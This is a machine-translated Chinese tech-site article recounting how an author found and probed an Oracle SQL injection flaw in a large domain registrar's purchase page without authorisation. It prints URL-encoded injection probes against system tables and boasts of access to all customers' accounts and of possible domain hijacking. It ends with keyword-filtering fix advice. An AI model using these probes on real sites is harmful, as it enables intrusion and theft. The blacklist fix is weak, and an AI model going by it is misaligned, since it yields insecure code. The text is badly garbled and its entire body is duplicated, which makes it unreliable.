Oracle also has injection vulnerabilities
- 2020-05-13 03:43:23
- OfStack
The ORACLE tutorial you are looking at is :Oracle also has injection vulnerabilities. Recently, MSN, jiangmin and other well-known websites have been threatened and attacked by hackers, a time on the network nervous. Our editorial office received a call from the author, the seraphim, who detailed the discovery of a vulnerability in the website of the country's largest provider of domain names (X). The editorial office of our newspaper immediately communicated with the chief engineer of X to confirm the authenticity of the vulnerability, and the engineer also repaired the vulnerability in time.
Send now
On October 18, after finishing my current project, I chatted with my friends all over the world. When I heard about the opening of my friend's website, I was very envious.
When will I get my own host and domain name... Thinking of applying for host and domain name, the author naturally thought of X (too famous in China ^_^). When I opened the homepage, I suddenly saw the login interface of the member in the upper right corner of the homepage, which made me feel like a "thief" again -- if only I could find any loopholes, since there is nothing to do now anyway.
The author took out the port scanning tool to sweep 1 X network server, unexpectedly what loophole did not find, really depressed! Think 1, after all, X network has been doing for more than 10 years, these large site server security measures may not be less - mapping, plus IDS and firewall, patches must have been full, perhaps there are honeypot procedures waiting for you!
After a while, I suddenly found a situation, X network was written in ASP. Some time ago, the injection of ASP+MSSQL vulnerability but make a lot of noise, many sites have suffered. Is there a problem here? Anyway, let's try 1 first. The author conveniently found a page to buy a virtual host: http://www.?? . cn HAS_Client/buy vir_host/vir_ host1_SB. asp? PackageID = 10341. The classic method was used to test 1, the return type is not matched: 'CDbl' error. What database does X use? The author added a single quote after the parameter, and then submitted the request. The page returned a paragraph of error information.
The original Oracle, 1 Oracle database has such a return error, there may be a vulnerability. This is similar to the return error of MSSQL with open quotation marks, but when MSSQL has such an error, we are almost certain that there is an injection vulnerability, while Oracle has to go one step further to make sure.
acknowledge
The following steps are very important as the basis for an invasion. We input in IE respectively:
http: / / www.????? . cn/HAS_Client/buy/vir_ host/vir_host1_SB asp? PackageID = 10341 'and % 200 < > (select % 20 count (*) % 20 from % 20 all_tables) % 20 and % 20 '1' = '1;
http: / / www.????? . cn/HAS_Client/buy/vir_ host/vir_host1_SB asp? PackageID = 10341 'and % 200 < > (select % 20 count (*) % 20 from % 20 user_tables) % 20 and % 20 '1' = '1;
http: / / www.????? . cn/HAS_Client/buy/vir _host/vir_host1_SB asp? PackageID = 10341 'and % 200 < > (select % 20 count (*) % 20 from % 20 user_tab_columns) % 20 and % 20 '1' = '1;
These are the system tables of Oracle that I guess: all_tables,user_tables and user_tab_col umns. If it doesn't, it's over.
Unexpectedly, all the pages were returned successfully, which indicates that the system table the author guessed exists, and also indicates that the submitted SQL statement has been processed by the program.
So far, the author confirms that injection vulnerabilities exist in the X network.
use
Database can be said to be the most important of 1 site, through the author found this vulnerability, we can completely access and modify all the data in the database. Not just user accounts, but all data in the database can be retrieved and modified.
In the case of open access to Public group UTL_File, you can also query and read files on the server using Union, which is similar to PHP+MYSQL injection vulnerability load_file(), but you can also execute Update and so on. However, I am still a novice in the study of injection vulnerability of Oracle, and I failed to implement inserting data and carrying out more advanced injection attacks. In the whole process of testing the vulnerability, the efficiency was greatly improved due to the use of NBSI's background scanning function and WPE.
I now have access to all of X's users and can easily change their domain names by logging in. If the author is a malicious attacker, as long as the domain name of a commercial site to point to their own production of a fake site, then the user login to this commercial site account information is not safe at all. In fact, this vulnerability is similar to domain name hijacking. As long as you are a user of X, I am sure I can hack your site. As for the X network, all its businesses may be affected, and the data can be arbitrarily obtained and manipulated.
Some of the other hazards are also obvious and will not be specified.
Take to repair
To prevent this type of injection vulnerability, it is simple to filter the parameters submitted in URL strictly by removing some characters such as single quotes and the SQL keyword. How to do it: use the program to check the string after the question mark in the submitted URL. Once 1 finds the single quotation mark, semicolon, SQL keyword and other special characters, it will immediately jump to a customized Error page.
For the administrators of the X network, it took less than five minutes to solve the problem. In addition, the X network should also strengthen the data security in the database 1, at least a secret bar!
By the way, there are many domestic sites have such injection vulnerability.
BianHou
After a number of worm and virus attacks, we are generally concerned about the security of the server 10 points, some sites even opened only 80 port. The security of the code running on the server today is particularly important. A small oversight in your code can cause a global crash.
Today there is a database injection vulnerability, what will appear tomorrow?
Send now
On October 18, after finishing my current project, I chatted with my friends all over the world. When I heard about the opening of my friend's website, I was very envious.
When will I get my own host and domain name... Thinking of applying for host and domain name, the author naturally thought of X (too famous in China ^_^). When I opened the homepage, I suddenly saw the login interface of the member in the upper right corner of the homepage, which made me feel like a "thief" again -- if only I could find any loopholes, since there is nothing to do now anyway.
The author took out the port scanning tool to sweep 1 X network server, unexpectedly what loophole did not find, really depressed! Think 1, after all, X network has been doing for more than 10 years, these large site server security measures may not be less - mapping, plus IDS and firewall, patches must have been full, perhaps there are honeypot procedures waiting for you!
After a while, I suddenly found a situation, X network was written in ASP. Some time ago, the injection of ASP+MSSQL vulnerability but make a lot of noise, many sites have suffered. Is there a problem here? Anyway, let's try 1 first. The author conveniently found a page to buy a virtual host: http://www.?? . cn HAS_Client/buy vir_host/vir_ host1_SB. asp? PackageID = 10341. The classic method was used to test 1, the return type is not matched: 'CDbl' error. What database does X use? The author added a single quote after the parameter, and then submitted the request. The page returned a paragraph of error information.
The original Oracle, 1 Oracle database has such a return error, there may be a vulnerability. This is similar to the return error of MSSQL with open quotation marks, but when MSSQL has such an error, we are almost certain that there is an injection vulnerability, while Oracle has to go one step further to make sure.
acknowledge
The following steps are very important as the basis for an invasion. We input in IE respectively:
http: / / www.????? . cn/HAS_Client/buy/vir_ host/vir_host1_SB asp? PackageID = 10341 'and % 200 < > (select % 20 count (*) % 20 from % 20 all_tables) % 20 and % 20 '1' = '1;
http: / / www.????? . cn/HAS_Client/buy/vir_ host/vir_host1_SB asp? PackageID = 10341 'and % 200 < > (select % 20 count (*) % 20 from % 20 user_tables) % 20 and % 20 '1' = '1;
http: / / www.????? . cn/HAS_Client/buy/vir _host/vir_host1_SB asp? PackageID = 10341 'and % 200 < > (select % 20 count (*) % 20 from % 20 user_tab_columns) % 20 and % 20 '1' = '1;
These are the system tables of Oracle that I guess: all_tables,user_tables and user_tab_col umns. If it doesn't, it's over.
Unexpectedly, all the pages were returned successfully, which indicates that the system table the author guessed exists, and also indicates that the submitted SQL statement has been processed by the program.
So far, the author confirms that injection vulnerabilities exist in the X network.
use
Database can be said to be the most important of 1 site, through the author found this vulnerability, we can completely access and modify all the data in the database. Not just user accounts, but all data in the database can be retrieved and modified.
In the case of open access to Public group UTL_File, you can also query and read files on the server using Union, which is similar to PHP+MYSQL injection vulnerability load_file(), but you can also execute Update and so on. However, I am still a novice in the study of injection vulnerability of Oracle, and I failed to implement inserting data and carrying out more advanced injection attacks. In the whole process of testing the vulnerability, the efficiency was greatly improved due to the use of NBSI's background scanning function and WPE.
I now have access to all of X's users and can easily change their domain names by logging in. If the author is a malicious attacker, as long as the domain name of a commercial site to point to their own production of a fake site, then the user login to this commercial site account information is not safe at all. In fact, this vulnerability is similar to domain name hijacking. As long as you are a user of X, I am sure I can hack your site. As for the X network, all its businesses may be affected, and the data can be arbitrarily obtained and manipulated.
Some of the other hazards are also obvious and will not be specified.
Take to repair
To prevent this type of injection vulnerability, it is simple to filter the parameters submitted in URL strictly by removing some characters such as single quotes and the SQL keyword. How to do it: use the program to check the string after the question mark in the submitted URL. Once 1 finds the single quotation mark, semicolon, SQL keyword and other special characters, it will immediately jump to a customized Error page.
For the administrators of the X network, it took less than five minutes to solve the problem. In addition, the X network should also strengthen the data security in the database 1, at least a secret bar!
By the way, there are many domestic sites have such injection vulnerability.
BianHou
After a number of worm and virus attacks, we are generally concerned about the security of the server 10 points, some sites even opened only 80 port. The security of the code running on the server today is particularly important. A small oversight in your code can cause a global crash.
Today there is a database injection vulnerability, what will appear tomorrow?